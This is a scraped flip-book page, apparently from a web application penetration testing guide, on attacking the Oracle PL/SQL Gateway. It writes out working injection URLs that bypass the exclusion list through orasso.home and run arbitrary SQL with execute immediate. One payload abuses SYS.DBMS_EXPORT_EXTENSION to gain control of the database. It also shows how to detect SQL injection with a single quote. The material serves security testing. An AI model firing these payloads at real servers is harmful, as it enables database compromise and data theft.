4.0
1NSchAb
1NSchAb
- No tags were found...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
118<br />
Web Application Penetration Testing<br />
PORTAL.WWV_HTP.CENTERCLOSE<br />
ORASSO.HOME<br />
WWC_VERSION.GET_HTTP_DATABASE_INFO<br />
An attacker should pick one of these functions that is actually<br />
available on the target system (i.e., returns a 200 OK when requested).<br />
As a test, an attacker can request<br />
http: /server.example.com/pls/dad/orasso.home?FOO=BAR<br />
http: /www.example.com/pls/dad/orasso.home?);OWA_<br />
UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+ALL_<br />
USERS<br />
To execute arbitrary SQL, including DML and DDL statements, the<br />
attacker inserts an execute immediate :1:<br />
http: /server.example.com/pls/dad/orasso.home?);execute%20immediate%20:1;--=select%201%20from%20dual<br />
the server should return a “404 File Not Found” response because<br />
the orasso.home procedure does not require parameters and one<br />
has been supplied. However, before the 404 is returned, the following<br />
PL/SQL is executed:<br />
..<br />
..<br />
if ((owa_match.match_pattern(‘orasso.home’, simple_<br />
list__, complex_list__, true))) then<br />
rc__ := 2;<br />
else<br />
null;<br />
orasso.wpg_session.init();<br />
orasso.home(FOO=>:FOO);<br />
..<br />
..<br />
Note the presence of FOO in the attacker’s query string. Attackers<br />
can abuse this to run arbitrary SQL. First, they need to close the<br />
brackets:<br />
http: /server.example.com/pls/dad/orasso.home?);--=BAR<br />
This results in the following PL/SQL being executed:<br />
..<br />
orasso.home();--=>:);--);<br />
..<br />
Note that everything after the double minus (--) is treated as a<br />
comment. This request will cause an internal server error because<br />
one of the bind variables is no longer used, so the attacker needs<br />
to add it back. As it happens, it’s this bind variable that is the key to<br />
running arbitrary PL/SQL. For the moment, they can just use HTP.<br />
PRINT to print BAR, and add the needed bind variable as :1:<br />
http: /server.example.com/pls/dad/orasso.home?);HTP.<br />
PRINT(:1);--=BAR<br />
This should return a 200 with the word “BAR” in the HTML. What’s<br />
happening here is that everything after the equals sign - BAR in<br />
this case - is the data inserted into the bind variable. Using the<br />
same technique it’s possible to also gain access to owa_util.cellsprint<br />
again:<br />
Note that the output won’t be displayed. This can be leveraged to<br />
exploit any PL/SQL injection bugs owned by SYS, thus enabling an<br />
attacker to gain complete control of the backend database server.<br />
For example, the following URL takes advantage of the SQL injection<br />
flaws in DBMS_EXPORT_EXTENSION (see http: /secunia.<br />
com/advisories/19860)<br />
http: /www.example.com/pls/dad/orasso.home?);<br />
execute%20immediate%20:1;--=DECLARE%20BUF%20<br />
VARCHAR2(2000);%20BEGIN%20<br />
BUF:=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_IN-<br />
DEX_TABLES<br />
(‘INDEX_NAME’,’INDEX_SCHEMA’,’DBMS_OUTPUT.PUT_<br />
LINE(:p1);<br />
EXECUTE%20IMMEDIATE%20’’CREATE%20OR%20RE-<br />
PLACE%20<br />
PUBLIC%20SYNONYM%20BREAKABLE%20FOR%20SYS.<br />
OWA_UTIL’’;<br />
END;--’,’SYS’,1,’VER’,0);END;<br />
Assessing Custom PL/SQL Web Applications<br />
During black box security assessments, the code of the custom<br />
PL/SQL application is not available, but it still needs to be assessed<br />
for security vulnerabilities.<br />
Testing for SQL Injection<br />
Each input parameter should be tested for SQL injection flaws.<br />
These are easy to find and confirm. Finding them is as easy as<br />
embedding a single quote into the parameter and checking for error<br />
responses (which include 404 Not Found errors). Confirming<br />
the presence of SQL injection can be performed using the concatenation<br />
operator.<br />
For example, assume there is a bookstore PL/SQL web application<br />
that allows users to search for books by a given author:<br />
http: /www.example.com/pls/bookstore/books.search?author=DICKENS<br />
If this request returns books by Charles Dickens, but<br />
http: /www.example.com/pls/bookstore/books.search?author=DICK’ENS<br />
returns an error or a 404, then there might be a SQL injection flaw.<br />
This can be confirmed by using the concatenation operator: